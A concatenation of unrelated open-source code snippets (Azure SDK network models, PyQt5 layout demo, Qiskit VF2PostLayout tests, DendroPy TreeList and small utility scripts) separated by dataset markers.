Variables are only populated by the server, and will be ignored when sending a request.
:param id: Resource id of the Virtual Network.
:type id: str
:ivar name: Name of the Virtual Network (read-only).
:vartype name: str
:ivar type: Resource type of the Virtual Network (read-only).
:vartype type: str
:param subnet: Subnet within the Virtual Network.
:type subnet: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'subnet': {'key': 'subnet', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VirtualNetworkProfile, self).__init__(**kwargs)
self.id = kwargs.get('id', None)
self.name = None
self.type = None
self.subnet = kwargs.get('subnet', None)
class VnetGateway(ProxyOnlyResource):
"""The Virtual Network gateway contract. This is used to give the Virtual Network gateway access to the VPN package.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param vnet_name: The Virtual Network name.
:type vnet_name: str
:param vpn_package_uri: The URI where the VPN package can be downloaded.
:type vpn_package_uri: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'vnet_name': {'key': 'properties.vnetName', 'type': 'str'},
'vpn_package_uri': {'key': 'properties.vpnPackageUri', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VnetGateway, self).__init__(**kwargs)
self.vnet_name = kwargs.get('vnet_name', None)
self.vpn_package_uri = kwargs.get('vpn_package_uri', None)
class VnetInfo(ProxyOnlyResource):
"""Virtual Network information contract.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param vnet_resource_id: The Virtual Network's resource ID.
:type vnet_resource_id: str
:ivar cert_thumbprint: The client certificate thumbprint.
:vartype cert_thumbprint: str
:param cert_blob: A certificate file (.cer) blob containing the public key of the private key
used to authenticate a
Point-To-Site VPN connection.
:type cert_blob: bytearray
:ivar routes: The routes that this Virtual Network connection uses.
:vartype routes: list[~azure.mgmt.web.v2016_09_01.models.VnetRoute]
:ivar resync_required: :code:`<code>true</code>` if a resync is required; otherwise,
:code:`<code>false</code>`.
:vartype resync_required: bool
:param dns_servers: DNS servers to be used by this Virtual Network. This should be a comma-
separated list of IP addresses.
:type dns_servers: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'cert_thumbprint': {'readonly': True},
'routes': {'readonly': True},
'resync_required': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'vnet_resource_id': {'key': 'properties.vnetResourceId', 'type': 'str'},
'cert_thumbprint': {'key': 'properties.certThumbprint', 'type': 'str'},
'cert_blob': {'key': 'properties.certBlob', 'type': 'bytearray'},
'routes': {'key': 'properties.routes', 'type': '[VnetRoute]'},
'resync_required': {'key': 'properties.resyncRequired', 'type': 'bool'},
'dns_servers': {'key': 'properties.dnsServers', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VnetInfo, self).__init__(**kwargs)
self.vnet_resource_id = kwargs.get('vnet_resource_id', None)
self.cert_thumbprint = None
self.cert_blob = kwargs.get('cert_blob', None)
self.routes = None
self.resync_required = None
self.dns_servers = kwargs.get('dns_servers', None)
class VnetRoute(ProxyOnlyResource):
"""Virtual Network route contract used to pass routing information for a Virtual Network.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param vnet_route_name: The name of this route. This is only returned by the server and does
not need to be set by the client.
:type vnet_route_name: str
:param start_address: The starting address for this route. This may also include a CIDR
notation, in which case the end address must not be specified.
:type start_address: str
:param end_address: The ending address for this route. If the start address is specified in
CIDR notation, this must be omitted.
:type end_address: str
:param route_type: The type of route this is:
DEFAULT - By default, every app has routes to the local address ranges specified by RFC1918
INHERITED - Routes inherited from the real Virtual Network routes
STATIC - Static route set on the app only
These values will be used for syncing an app's routes with those from a Virtual Network.
Possible values include: "DEFAULT", "INHERITED", "STATIC".
:type route_type: str or ~azure.mgmt.web.v2016_09_01.models.RouteType
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'vnet_route_name': {'key': 'properties.name', 'type': 'str'},
'start_address': {'key': 'properties.startAddress', 'type': 'str'},
'end_address': {'key': 'properties.endAddress', 'type': 'str'},
'route_type': {'key': 'properties.routeType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VnetRoute, self).__init__(**kwargs)
self.vnet_route_name = kwargs.get('vnet_route_name', None)
self.start_address = kwargs.get('start_address', None)
self.end_address = kwargs.get('end_address', None)
self.route_type = kwargs.get('route_type', None)
class WebAppCollection(msrest.serialization.Model):
"""Collection of App Service apps.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.Site]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[Site]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(WebAppCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class WorkerPool(msrest.serialization.Model):
"""Worker pool of an App Service Environment.
Variables are only populated by the server, and will be ignored when sending a request.
:param worker_size_id: Worker size ID for referencing this worker pool.
:type worker_size_id: int
:param compute_mode: Shared or dedicated app hosting. Possible values include: "Shared",
"Dedicated", "Dynamic".
:type compute_mode: str or ~azure.mgmt.web.v2016_09_01.models.ComputeModeOptions
:param worker_size: VM size of the worker pool instances.
:type worker_size: str
:param worker_count: Number of instances in the worker pool.
:type worker_count: int
:ivar instance_names: Names of all instances in the worker pool (read only).
:vartype instance_names: list[str]
"""
_validation = {
'instance_names': {'readonly': True},
}
_attribute_map = {
'worker_size_id': {'key': 'workerSizeId', 'type': 'int'},
'compute_mode': {'key': 'computeMode', 'type': 'str'},
'worker_size': {'key': 'workerSize', 'type': 'str'},
'worker_count': {'key': 'workerCount', 'type': 'int'},
'instance_names': {'key': 'instanceNames', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(WorkerPool, self).__init__(**kwargs)
self.worker_size_id = kwargs.get('worker_size_id', None)
self.compute_mode = kwargs.get('compute_mode', None)
self.worker_size = kwargs.get('worker_size', None)
self.worker_count = kwargs.get('worker_count', None)
self.instance_names = None
class WorkerPoolCollection(msrest.serialization.Model):
"""Collection of worker pools.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.WorkerPoolResource]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[WorkerPoolResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(WorkerPoolCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class WorkerPoolResource(ProxyOnlyResource):
"""Worker pool of an App Service Environment ARM resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param sku: Description of a SKU for a scalable resource.
:type sku: ~azure.mgmt.web.v2016_09_01.models.SkuDescription
:param worker_size_id: Worker size ID for referencing this worker pool.
:type worker_size_id: int
:param compute_mode: Shared or dedicated app hosting. Possible values include: "Shared",
"Dedicated", "Dynamic".
:type compute_mode: str or ~azure.mgmt.web.v2016_09_01.models.ComputeModeOptions
:param worker_size: VM size of the worker pool instances.
:type worker_size: str
:param worker_count: Number of instances in the worker pool.
:type worker_count: int
:ivar instance_names: Names of all instances in the worker pool (read only).
:vartype instance_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'instance_names': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'SkuDescription'},
'worker_size_id': {'key': 'properties.workerSizeId', 'type': 'int'},
'compute_mode': {'key': 'properties.computeMode', 'type': 'str'},
'worker_size': {'key': 'properties.workerSize', 'type': 'str'},
'worker_count': {'key': 'properties.workerCount', 'type': 'int'},
'instance_names': {'key': 'properties.instanceNames', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(WorkerPoolResource, self).__init__(**kwargs)
self.sku = kwargs.get('sku', None)
self.worker_size_id = kwargs.get('worker_size_id', None)
self.compute_mode = kwargs.get('compute_mode', None)
self.worker_size = kwargs.get('worker_size', None)
self.worker_count = kwargs.get('worker_count', None)
self.instance_names = None
| StarcoderdataPython |
3213948 | #!/usr/bin/env python
import my_module2
print 'Hello from my_modules.py' | StarcoderdataPython |
11271800 | """Collection of all exception classes
"""
class HdtopException(Exception):
"""Based type for all exceptions"""
class ConfigValueError(HdtopException, ValueError):
"""Config value is not allowed."""
def __str__(self) -> str:
msg = f"Invalid configuration value: {self.args[0]}"
if len(self.args) == 2:
expected = self.args[1]
msg += ". Expected values: %s" % ", ".join(expected)
return msg
class MissingConfigurationError(ConfigValueError):
"""Config is required but not found"""
def __str__(self) -> str:
wanted_key = self.args[0]
return f"Config `{wanted_key}` is required. Use `hdtop config {wanted_key} <value>` to set one."
| StarcoderdataPython |
8179053 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import logging
logging.warning('% s before you %s', 'look', 'leap')
| StarcoderdataPython |
1975627 | <filename>scripts/uniq_hash.py
#!/usr/bin/python3
import fileinput
import sys
f = fileinput.input()
header = next(f)
sys.stdout.write(header)
h_index = header.split(',').index('hash')
seen = set()
for line in f:
h = line.split(',')[h_index]
if h in seen: continue
seen.add(h)
sys.stdout.write(line)
| StarcoderdataPython |
1811602 | nums = [1, 2, 3, 4]
new_nums = [0] * len(nums) # initialize a new list with the same length as nums
for i in range(len(nums)):
new_nums[i] = new_nums[i - 1] + nums[i]
print(new_nums)
| StarcoderdataPython |
6519812 | <reponame>seekindark/helloworld
import sys
from PyQt5.QtWidgets import QApplication ,QWidget ,QFormLayout , \
QLineEdit, QLabel, QPushButton,QRadioButton
from PyQt5.QtCore import Qt
class Winform(QWidget):
def __init__(self, parent=None):
super(Winform, self).__init__(parent)
self.setWindowTitle("窗体布局管理例子")
self.resize(400, 100)
fromlayout = QFormLayout()
labl1 = QLabel("标签1")
lineEdit1 = QLineEdit()
labl2 = QLabel("标签2")
lineEdit2 = QLineEdit()
labl3 = QLabel("标签3")
lineEdit3 = QLineEdit()
fromlayout.addRow(labl1, lineEdit1)
fromlayout.addRow(labl2, lineEdit2)
fromlayout.addRow(labl3, lineEdit3)
fromlayout.addRow('xxxssssssssssdddd', QLineEdit())
fromlayout.addRow(QPushButton('aaa'), QRadioButton('bbb'))
# 该参数通常适用于小屏幕中,当标签和文本框在本行显示不全时,文本框会显示在下一行,使得标签独占一行
fromlayout.setRowWrapPolicy(QFormLayout.WrapLongRows)
fromlayout.setLabelAlignment(Qt.AlignRight) # 设置标签的对齐方式
self.setLayout(fromlayout)
if __name__ == "__main__":
app = QApplication(sys.argv)
form = Winform()
form.show()
sys.exit(app.exec_()) | StarcoderdataPython |
358509 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test the VF2Layout pass"""
import retworkx
from qiskit import QuantumRegister, QuantumCircuit
from qiskit.transpiler import CouplingMap, Layout, TranspilerError
from qiskit.transpiler.passes.layout import vf2_utils
from qiskit.transpiler.passes.layout.vf2_post_layout import VF2PostLayout, VF2PostLayoutStopReason
from qiskit.converters import circuit_to_dag
from qiskit.test import QiskitTestCase
from qiskit.test.mock import FakeYorktown, FakeLima, FakeLimaV2, FakeYorktownV2
from qiskit.circuit import Qubit
from qiskit.compiler.transpiler import transpile
class TestVF2PostLayout(QiskitTestCase):
"""Tests the VF2Layout pass"""
seed = 42
def assertLayout(self, dag, coupling_map, property_set):
"""Checks if the circuit in dag was a perfect layout in property_set for the given
coupling_map"""
self.assertEqual(
property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.SOLUTION_FOUND
)
layout = property_set["post_layout"]
for gate in dag.two_qubit_ops():
if dag.has_calibration_for(gate):
continue
physical_q0 = layout[gate.qargs[0]]
physical_q1 = layout[gate.qargs[1]]
self.assertTrue(coupling_map.graph.has_edge(physical_q0, physical_q1))
def assertLayoutV2(self, dag, target, property_set):
"""Checks if the circuit in dag was a perfect layout in property_set for the given
coupling_map"""
self.assertEqual(
property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.SOLUTION_FOUND
)
layout = property_set["post_layout"]
for gate in dag.two_qubit_ops():
if dag.has_calibration_for(gate):
continue
physical_q0 = layout[gate.qargs[0]]
physical_q1 = layout[gate.qargs[1]]
qargs = (physical_q0, physical_q1)
self.assertTrue(target.instruction_supported(gate.name, qargs))
def test_no_constraints(self):
"""Test we raise at runtime if no target or coupling graph specified."""
qc = QuantumCircuit(2)
empty_pass = VF2PostLayout()
with self.assertRaises(TranspilerError):
empty_pass.run(circuit_to_dag(qc))
def test_no_backend_properties(self):
"""Test we raise at runtime if no properties are provided with a coupling graph."""
qc = QuantumCircuit(2)
empty_pass = VF2PostLayout(coupling_map=CouplingMap([(0, 1), (1, 2)]))
with self.assertRaises(TranspilerError):
empty_pass.run(circuit_to_dag(qc))
def test_empty_circuit(self):
"""Test no solution found for empty circuit"""
qc = QuantumCircuit(2, 2)
backend = FakeLima()
cmap = CouplingMap(backend.configuration().coupling_map)
props = backend.properties()
vf2_pass = VF2PostLayout(coupling_map=cmap, properties=props)
vf2_pass.run(circuit_to_dag(qc))
self.assertEqual(
vf2_pass.property_set["VF2PostLayout_stop_reason"],
VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
)
def test_empty_circuit_v2(self):
"""Test no solution found for empty circuit with v2 backend"""
qc = QuantumCircuit(2, 2)
backend = FakeLimaV2()
vf2_pass = VF2PostLayout(target=backend.target)
vf2_pass.run(circuit_to_dag(qc))
self.assertEqual(
vf2_pass.property_set["VF2PostLayout_stop_reason"],
VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
)
def test_skip_3q_circuit(self):
"""Test that the pass is a no-op on circuits with >2q gates."""
qc = QuantumCircuit(3)
qc.ccx(0, 1, 2)
backend = FakeLima()
cmap = CouplingMap(backend.configuration().coupling_map)
props = backend.properties()
vf2_pass = VF2PostLayout(coupling_map=cmap, properties=props)
vf2_pass.run(circuit_to_dag(qc))
self.assertEqual(
vf2_pass.property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.MORE_THAN_2Q
)
def test_skip_3q_circuit_v2(self):
"""Test that the pass is a no-op on circuits with >2q gates with a target."""
qc = QuantumCircuit(3)
qc.ccx(0, 1, 2)
backend = FakeLimaV2()
vf2_pass = VF2PostLayout(target=backend.target)
vf2_pass.run(circuit_to_dag(qc))
self.assertEqual(
vf2_pass.property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.MORE_THAN_2Q
)
def test_best_mapping_ghz_state_full_device_multiple_qregs(self):
"""Test best mappings with multiple registers"""
backend = FakeLima()
qr_a = QuantumRegister(2)
qr_b = QuantumRegister(3)
qc = QuantumCircuit(qr_a, qr_b)
qc.h(qr_a[0])
qc.cx(qr_a[0], qr_a[1])
qc.cx(qr_a[0], qr_b[0])
qc.cx(qr_a[0], qr_b[1])
qc.cx(qr_a[0], qr_b[2])
qc.measure_all()
tqc = transpile(qc, backend, seed_transpiler=self.seed, layout_method="trivial")
initial_layout = tqc._layout
dag = circuit_to_dag(tqc)
cmap = CouplingMap(backend.configuration().coupling_map)
props = backend.properties()
pass_ = VF2PostLayout(coupling_map=cmap, properties=props, seed=self.seed)
pass_.run(dag)
self.assertLayout(dag, cmap, pass_.property_set)
self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
def test_2q_circuit_5q_backend(self):
"""A simple example, without considering the direction
0 - 1
qr1 - qr0
"""
backend = FakeYorktown()
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.cx(qr[1], qr[0]) # qr1 -> qr0
tqc = transpile(circuit, backend, layout_method="dense")
initial_layout = tqc._layout
dag = circuit_to_dag(tqc)
cmap = CouplingMap(backend.configuration().coupling_map)
props = backend.properties()
pass_ = VF2PostLayout(coupling_map=cmap, properties=props, seed=self.seed)
pass_.run(dag)
self.assertLayout(dag, cmap, pass_.property_set)
self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
def test_best_mapping_ghz_state_full_device_multiple_qregs_v2(self):
"""Test best mappings with multiple registers"""
backend = FakeLimaV2()
qr_a = QuantumRegister(2)
qr_b = QuantumRegister(3)
qc = QuantumCircuit(qr_a, qr_b)
qc.h(qr_a[0])
qc.cx(qr_a[0], qr_a[1])
qc.cx(qr_a[0], qr_b[0])
qc.cx(qr_a[0], qr_b[1])
qc.cx(qr_a[0], qr_b[2])
qc.measure_all()
tqc = transpile(qc, backend, seed_transpiler=self.seed, layout_method="trivial")
initial_layout = tqc._layout
dag = circuit_to_dag(tqc)
pass_ = VF2PostLayout(target=backend.target, seed=self.seed)
pass_.run(dag)
self.assertLayoutV2(dag, backend.target, pass_.property_set)
self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
def test_2q_circuit_5q_backend_v2(self):
"""A simple example, without considering the direction
0 - 1
qr1 - qr0
"""
backend = FakeYorktownV2()
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.cx(qr[1], qr[0]) # qr1 -> qr0
tqc = transpile(circuit, backend, layout_method="dense")
initial_layout = tqc._layout
dag = circuit_to_dag(tqc)
pass_ = VF2PostLayout(target=backend.target, seed=self.seed)
pass_.run(dag)
self.assertLayoutV2(dag, backend.target, pass_.property_set)
self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
def test_target_invalid_2q_gate(self):
"""Test that we don't find a solution with a gate outside target."""
backend = FakeYorktownV2()
qc = QuantumCircuit(2)
qc.ecr(0, 1)
dag = circuit_to_dag(qc)
pass_ = VF2PostLayout(target=backend.target, seed=self.seed)
pass_.run(dag)
self.assertEqual(
pass_.property_set["VF2PostLayout_stop_reason"],
VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
)
class TestVF2PostLayoutScoring(QiskitTestCase):
"""Test scoring heuristic function for VF2PostLayout."""
def test_empty_score(self):
"""Test error rate is 0 for empty circuit."""
bit_map = {}
reverse_bit_map = {}
im_graph = retworkx.PyDiGraph()
backend = FakeYorktownV2()
vf2_pass = VF2PostLayout(target=backend.target)
layout = Layout()
score = vf2_pass._score_layout(layout, bit_map, reverse_bit_map, im_graph)
self.assertEqual(0, score)
def test_all_1q_score(self):
"""Test error rate for all 1q input."""
bit_map = {Qubit(): 0, Qubit(): 1}
reverse_bit_map = {v: k for k, v in bit_map.items()}
im_graph = retworkx.PyDiGraph()
im_graph.add_node({"sx": 1})
im_graph.add_node({"sx": 1})
backend = FakeYorktownV2()
vf2_pass = VF2PostLayout(target=backend.target)
layout = Layout(bit_map)
score = vf2_pass._score_layout(layout, bit_map, reverse_bit_map, im_graph)
self.assertAlmostEqual(0.002925, score, places=5)
def test_all_1q_avg_score(self):
"""Test average scoring for all 1q input."""
bit_map = {Qubit(): 0, Qubit(): 1}
reverse_bit_map = {v: k for k, v in bit_map.items()}
im_graph = retworkx.PyDiGraph()
im_graph.add_node({"sx": 1})
im_graph.add_node({"sx": 1})
backend = FakeYorktownV2()
vf2_pass = VF2PostLayout(target=backend.target)
vf2_pass.avg_error_map = vf2_utils.build_average_error_map(
vf2_pass.target, vf2_pass.properties, vf2_pass.coupling_map
)
layout = Layout(bit_map)
score = vf2_utils.score_layout(
vf2_pass.avg_error_map, layout, bit_map, reverse_bit_map, im_graph
)
self.assertAlmostEqual(0.02054, score, places=5)
class TestVF2PostLayoutUndirected(QiskitTestCase):
"""Tests the VF2Layout pass"""
seed = 42
def assertLayout(self, dag, coupling_map, property_set):
"""Checks if the circuit in dag was a perfect layout in property_set for the given
coupling_map"""
self.assertEqual(
property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.SOLUTION_FOUND
)
layout = property_set["post_layout"]
for gate in dag.two_qubit_ops():
if dag.has_calibration_for(gate):
continue
physical_q0 = layout[gate.qargs[0]]
physical_q1 = layout[gate.qargs[1]]
self.assertTrue(coupling_map.graph.has_edge(physical_q0, physical_q1))
def assertLayoutV2(self, dag, target, property_set):
"""Checks if the circuit in dag was a perfect layout in property_set for the given
coupling_map"""
self.assertEqual(
property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.SOLUTION_FOUND
)
layout = property_set["post_layout"]
for gate in dag.two_qubit_ops():
if dag.has_calibration_for(gate):
continue
physical_q0 = layout[gate.qargs[0]]
physical_q1 = layout[gate.qargs[1]]
qargs = (physical_q0, physical_q1)
self.assertTrue(target.instruction_supported(gate.name, qargs))
def test_no_constraints(self):
"""Test we raise at runtime if no target or coupling graph specified."""
qc = QuantumCircuit(2)
empty_pass = VF2PostLayout(strict_direction=False)
with self.assertRaises(TranspilerError):
empty_pass.run(circuit_to_dag(qc))
def test_no_backend_properties(self):
"""Test we raise at runtime if no properties are provided with a coupling graph."""
qc = QuantumCircuit(2)
empty_pass = VF2PostLayout(
coupling_map=CouplingMap([(0, 1), (1, 2)]), strict_direction=False
)
with self.assertRaises(TranspilerError):
empty_pass.run(circuit_to_dag(qc))
def test_empty_circuit(self):
"""Test no solution found for empty circuit"""
qc = QuantumCircuit(2, 2)
backend = FakeLima()
cmap = CouplingMap(backend.configuration().coupling_map)
props = backend.properties()
vf2_pass = VF2PostLayout(coupling_map=cmap, properties=props, strict_direction=False)
vf2_pass.run(circuit_to_dag(qc))
self.assertEqual(
vf2_pass.property_set["VF2PostLayout_stop_reason"],
VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
)
def test_empty_circuit_v2(self):
"""Test no solution found for empty circuit with v2 backend"""
qc = QuantumCircuit(2, 2)
backend = FakeLimaV2()
vf2_pass = VF2PostLayout(target=backend.target, strict_direction=False)
vf2_pass.run(circuit_to_dag(qc))
self.assertEqual(
vf2_pass.property_set["VF2PostLayout_stop_reason"],
VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
)
def test_skip_3q_circuit(self):
"""Test that the pass is a no-op on circuits with >2q gates."""
qc = QuantumCircuit(3)
qc.ccx(0, 1, 2)
backend = FakeLima()
cmap = CouplingMap(backend.configuration().coupling_map)
props = backend.properties()
vf2_pass = VF2PostLayout(coupling_map=cmap, properties=props, strict_direction=False)
vf2_pass.run(circuit_to_dag(qc))
self.assertEqual(
vf2_pass.property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.MORE_THAN_2Q
)
def test_skip_3q_circuit_v2(self):
"""Test that the pass is a no-op on circuits with >2q gates with a target."""
qc = QuantumCircuit(3)
qc.ccx(0, 1, 2)
backend = FakeLimaV2()
vf2_pass = VF2PostLayout(target=backend.target, strict_direction=False)
vf2_pass.run(circuit_to_dag(qc))
self.assertEqual(
vf2_pass.property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.MORE_THAN_2Q
)
def test_best_mapping_ghz_state_full_device_multiple_qregs(self):
"""Test best mappings with multiple registers"""
backend = FakeLima()
qr_a = QuantumRegister(2)
qr_b = QuantumRegister(3)
qc = QuantumCircuit(qr_a, qr_b)
qc.h(qr_a[0])
qc.cx(qr_a[0], qr_a[1])
qc.cx(qr_a[0], qr_b[0])
qc.cx(qr_a[0], qr_b[1])
qc.cx(qr_a[0], qr_b[2])
qc.measure_all()
tqc = transpile(qc, backend, seed_transpiler=self.seed, layout_method="trivial")
initial_layout = tqc._layout
dag = circuit_to_dag(tqc)
cmap = CouplingMap(backend.configuration().coupling_map)
props = backend.properties()
pass_ = VF2PostLayout(
coupling_map=cmap, properties=props, seed=self.seed, strict_direction=False
)
pass_.run(dag)
self.assertLayout(dag, cmap, pass_.property_set)
self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
def test_2q_circuit_5q_backend(self):
"""A simple example, without considering the direction
0 - 1
qr1 - qr0
"""
backend = FakeYorktown()
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.cx(qr[1], qr[0]) # qr1 -> qr0
tqc = transpile(circuit, backend, layout_method="dense")
initial_layout = tqc._layout
dag = circuit_to_dag(tqc)
cmap = CouplingMap(backend.configuration().coupling_map)
props = backend.properties()
pass_ = VF2PostLayout(
coupling_map=cmap, properties=props, seed=self.seed, strict_direction=False
)
pass_.run(dag)
self.assertLayout(dag, cmap, pass_.property_set)
self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
def test_best_mapping_ghz_state_full_device_multiple_qregs_v2(self):
"""Test best mappings with multiple registers"""
backend = FakeLimaV2()
qr_a = QuantumRegister(2)
qr_b = QuantumRegister(3)
qc = QuantumCircuit(qr_a, qr_b)
qc.h(qr_a[0])
qc.cx(qr_a[0], qr_a[1])
qc.cx(qr_a[0], qr_b[0])
qc.cx(qr_a[0], qr_b[1])
qc.cx(qr_a[0], qr_b[2])
qc.measure_all()
tqc = transpile(qc, backend, seed_transpiler=self.seed, layout_method="trivial")
initial_layout = tqc._layout
dag = circuit_to_dag(tqc)
pass_ = VF2PostLayout(target=backend.target, seed=self.seed, strict_direction=False)
pass_.run(dag)
self.assertLayoutV2(dag, backend.target, pass_.property_set)
self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
def test_2q_circuit_5q_backend_v2(self):
"""A simple example, without considering the direction
0 - 1
qr1 - qr0
"""
backend = FakeYorktownV2()
qr = QuantumRegister(2, "qr")
circuit = QuantumCircuit(qr)
circuit.cx(qr[1], qr[0]) # qr1 -> qr0
tqc = transpile(circuit, backend, layout_method="dense")
initial_layout = tqc._layout
dag = circuit_to_dag(tqc)
pass_ = VF2PostLayout(target=backend.target, seed=self.seed, strict_direction=False)
pass_.run(dag)
self.assertLayoutV2(dag, backend.target, pass_.property_set)
self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
| StarcoderdataPython |
6629148 | #! /usr/bin/env python
##############################################################################
## DendroPy Phylogenetic Computing Library.
##
## Copyright 2010-2015 <NAME> and <NAME>.
## All rights reserved.
##
## See "LICENSE.rst" for terms and conditions of usage.
##
## If you use this work or any portion thereof in published work,
## please cite it as:
##
## <NAME>. and <NAME>. 2010. DendroPy: a Python library
## for phylogenetic computing. Bioinformatics 26: 1569-1571.
##
##############################################################################
"""
This module handles the core definition of classes that model collections of
trees.
"""
import collections
import math
import copy
import sys
from dendropy.utility import container
from dendropy.utility import error
from dendropy.utility import bitprocessing
from dendropy.utility import deprecate
from dendropy.utility import constants
from dendropy.calculate import statistics
from dendropy.datamodel import basemodel
from dendropy.datamodel import taxonmodel
from dendropy.datamodel import treemodel
from dendropy import dataio
##############################################################################
### TreeList
class TreeList(
taxonmodel.TaxonNamespaceAssociated,
basemodel.Annotable,
basemodel.Deserializable,
basemodel.MultiReadable,
basemodel.Serializable,
basemodel.DataObject):
"""
A collection of |Tree| objects, all referencing the same "universe" of
opeational taxonomic unit concepts through the same |TaxonNamespace|
object reference.
"""
def _parse_and_create_from_stream(cls,
stream,
schema,
collection_offset=None,
tree_offset=None,
**kwargs):
"""
Constructs a new |TreeList| object and populates it with trees from
file-like object ``stream``.
Notes
-----
*All* operational taxonomic unit concepts in the data source will be included
in the |TaxonNamespace| object associated with the new
|TreeList| object and its contained |Tree| objects, even those
not associated with trees or the particular trees being retrieved.
Parameters
----------
stream : file or file-like object
Source of data.
schema : string
Identifier of format of data in ``stream``
collection_offset : integer or None
0-based index indicating collection of trees to parse. If |None|,
then all tree collections are retrieved, with each distinct
collection parsed into a separate |TreeList| object. If the
tree colleciton offset index is equal or greater than the number of
tree collections in the data source, then IndexError is raised.
Negative offsets work like negative list indexes; e.g., a
``collection_offset`` of -1 means to read the last collection of
trees in the data source. For data formats that do not support the
concept of distinct tree collections (e.g. NEWICK) are considered
single-collection data source (i.e, the only acceptable
``collection_offset`` values are -1 or 0).
tree_offset : integer or None
0-based index indicating particular tree within a particular
collection of trees at which to begin reading. If not specified or
|None| (default), then all trees are parsed. Otherwise, must be an
integer value up the length of the collection minus 1. A positive
offset indicates the number of trees in the collection to skip;
e.g. a ``tree_offset`` of 20 means to skip the first 20 trees in the
collection. Negative offsets work like negative list indexes;
